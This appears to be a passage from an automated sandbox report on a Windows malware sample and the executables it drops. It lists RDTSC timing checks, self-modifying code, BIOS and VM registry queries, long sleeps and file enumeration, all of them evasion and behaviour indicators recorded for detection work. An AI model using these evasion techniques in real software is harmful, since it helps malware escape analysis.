                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70AAF second address: 4A70AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A707EF second address: 4A707F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A707F3 second address: 4A707F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A707F9 second address: 4A70857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e pushfd 0x0000000f jmp 00007FB3E0C7B6A8h 0x00000014 adc ch, 00000018h 0x00000017 jmp 00007FB3E0C7B69Bh 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB3E0C7B6A4h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70857 second address: 4A70896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB3E1482E91h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FB3E1482E8Ah 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB3E1482E97h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70896 second address: 4A7089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A7089C second address: 4A708A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A708A0 second address: 4A708C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop edx 0x0000000e call 00007FB3E0C7B6A4h 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A708C4 second address: 4A708CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A708CA second address: 4A708CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1013F second address: 4A10164 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10164 second address: 4A10168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10168 second address: 4A1016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1016E second address: 4A1019E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB3E0C7B6A7h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70C8B second address: 4A70C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70C91 second address: 4A70C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70C97 second address: 4A70CCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FB3E1482E90h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB3E1482E8Dh 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70CCE second address: 4A70CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70CD2 second address: 4A70CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70CD8 second address: 4A70D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB3E0C7B69Ah 0x00000009 sub ecx, 20124CE8h 0x0000000f jmp 00007FB3E0C7B69Bh 0x00000014 popfd 0x00000015 mov esi, 251EECDFh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov ax, 98D7h 0x00000023 push eax 0x00000024 push edx 0x00000025 mov dx, cx 0x00000028 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D0B second address: 4A70D49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FB3E1482E8Ch 0x00000010 push esi 0x00000011 pop edx 0x00000012 popad 0x00000013 pushad 0x00000014 movzx eax, bx 0x00000017 popad 0x00000018 popad 0x00000019 push dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d mov cx, dx 0x00000020 jmp 00007FB3E1482E8Dh 0x00000025 popad 0x00000026 push dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D49 second address: 4A70D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D4D second address: 4A70D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A70D53 second address: 4A70D7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 63C60F99h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB3E0C7B69Ch 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26D804 second address: 26D823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB3E1482E94h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26D823 second address: 26D831 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FB3E0C7B696h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26DC81 second address: 26DC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB3E1482E86h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A205EC second address: 4A20627 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB3E0C7B6A5h 0x00000008 sbb al, 00000046h 0x0000000b jmp 00007FB3E0C7B6A1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 push 6D2FD087h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20627 second address: 4A2063F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2063F second address: 4A2067E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 09C8EF91h 0x00000010 jmp 00007FB3E0C7B6A6h 0x00000015 push 5F1F61DBh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB3E0C7B69Ch 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2067E second address: 4A2072A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E1482E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 29F0CFDBh 0x00000010 pushad 0x00000011 jmp 00007FB3E1482E94h 0x00000016 call 00007FB3E1482E92h 0x0000001b push esi 0x0000001c pop edx 0x0000001d pop esi 0x0000001e popad 0x0000001f mov eax, dword ptr fs:[00000000h] 0x00000025 jmp 00007FB3E1482E8Dh 0x0000002a nop 0x0000002b pushad 0x0000002c mov dh, al 0x0000002e mov bh, 6Eh 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007FB3E1482E8Bh 0x00000037 nop 0x00000038 jmp 00007FB3E1482E96h 0x0000003d sub esp, 1Ch 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FB3E1482E8Dh 0x00000049 sub ax, F9E6h 0x0000004e jmp 00007FB3E1482E91h 0x00000053 popfd 0x00000054 mov edx, esi 0x00000056 popad 0x00000057 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2072A second address: 4A20742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3E0C7B69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20742 second address: 4A20748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20748 second address: 4A20759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 01F7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, eax 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20759 second address: 4A20779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov ah, bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FB3E1482E8Eh 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20779 second address: 4A2077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Tries to evade debugger and weak emulator (self modifying code)
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 265327 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2EE8CC instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 11A5327 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 122E8CC instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSpecial instruction interceptor: First address: 187A18 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSpecial instruction interceptor: First address: 18799B instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSpecial instruction interceptor: First address: 3255D5 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSpecial instruction interceptor: First address: 34D5DB instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSpecial instruction interceptor: First address: 3344BF instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeSpecial instruction interceptor: First address: 3B2969 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSpecial instruction interceptor: First address: DCBC01 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSpecial instruction interceptor: First address: F7B34A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSpecial instruction interceptor: First address: DC9572 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSpecial instruction interceptor: First address: F87CD7 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeSpecial instruction interceptor: First address: DCBB2C instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04A70C76 rdtsc 0_2_04A70C76
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 918Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 954Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1137Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 910Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1058Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1045Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1111Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1626Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5063
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2073
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5067
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1219
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow / User API: threadDelayed 816
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow / User API: threadDelayed 817
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow / User API: threadDelayed 741
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow / User API: threadDelayed 1011
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow / User API: threadDelayed 989
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1727
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1018973001\adcf1df75f.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.2 %
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comAPI coverage: 3.7 %
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6612Thread sleep count: 33 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6612Thread sleep time: -66033s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2780Thread sleep count: 918 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2780Thread sleep time: -1836918s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1524Thread sleep count: 244 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1524Thread sleep time: -7320000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6576Thread sleep count: 954 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6576Thread sleep time: -1908954s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2940Thread sleep count: 1137 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2940Thread sleep time: -2275137s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3376Thread sleep count: 910 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3376Thread sleep time: -1820910s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6256Thread sleep count: 1058 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6256Thread sleep time: -2117058s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6432Thread sleep count: 1045 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6432Thread sleep time: -2091045s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6692Thread sleep count: 1111 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6692Thread sleep time: -2223111s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6256Thread sleep count: 1626 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6256Thread sleep time: -3253626s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4436Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe TID: 2612Thread sleep time: -60000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe TID: 2612Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe TID: 5412Thread sleep time: -240000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 1888Thread sleep count: 816 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 1888Thread sleep time: -1632816s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 5544Thread sleep count: 817 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 5544Thread sleep time: -1634817s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 5248Thread sleep count: 741 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 5248Thread sleep time: -1482741s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 6448Thread sleep count: 1011 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 6448Thread sleep time: -2023011s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 2568Thread sleep count: 989 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe TID: 2568Thread sleep time: -1978989s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe TID: 2980Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe TID: 2980Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8228Thread sleep time: -6456360425798339s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_00667978 FindFirstFileW,FindFirstFileW,free,10_2_00667978
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_00406301 FindFirstFileW,FindClose,28_2_00406301
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeCode function: 28_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,28_2_00406CC7
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,44_2_0008DC54
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0009A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,44_2_0009A087
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0009A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,44_2_0009A1E2
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,44_2_0008E472
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0009A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,44_2_0009A570
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0005C622 FindFirstFileExW,44_2_0005C622
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000966DC FindFirstFileW,FindNextFileW,FindClose,44_2_000966DC
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_00097333 FindFirstFileW,FindClose,44_2_00097333
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,44_2_000973D4
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0008D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,44_2_0008D921
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0066881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,10_2_0066881C
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 10_2_0066B5E0 GetSystemInfo,10_2_0066B5E0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
